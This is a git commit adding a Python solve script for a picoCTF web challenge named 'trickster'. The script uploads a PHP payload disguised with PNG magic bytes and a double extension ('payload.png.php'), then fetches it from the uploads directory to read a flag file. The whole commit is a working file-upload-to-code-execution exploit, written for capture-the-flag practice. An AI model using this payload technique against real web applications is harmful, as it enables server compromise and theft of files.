web/trickster

This commit is contained in:
Oystein Kristoffer Tveit 2024-09-05 19:54:46 +02:00
parent 147cc5ec57
commit 20a447923a
Signed by: oysteikt
GPG Key ID: 9F2F7D8250F35146
1 changed files with 31 additions and 0 deletions

31
web/trickster/solve.py Executable file
View File

@ -0,0 +1,31 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3 python3Packages.requests
import requests
BASE_URL = "http://atlas.picoctf.net:65066"
def main():
PNG_HEADER = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])
payload = PNG_HEADER + b'''
<?php
echo(file_get_contents("../GQ4DOOBVMMYGK.txt"))
?>
'''
requests.post(
BASE_URL + "/",
files = {
'file': ('payload.png.php', payload),
'submit': 'Upload File',
}
)
# Found through /robots.txt
res = requests.get(BASE_URL + "/uploads/payload.png.php")
print(res)
print(res.text)
if __name__ == '__main__':
main()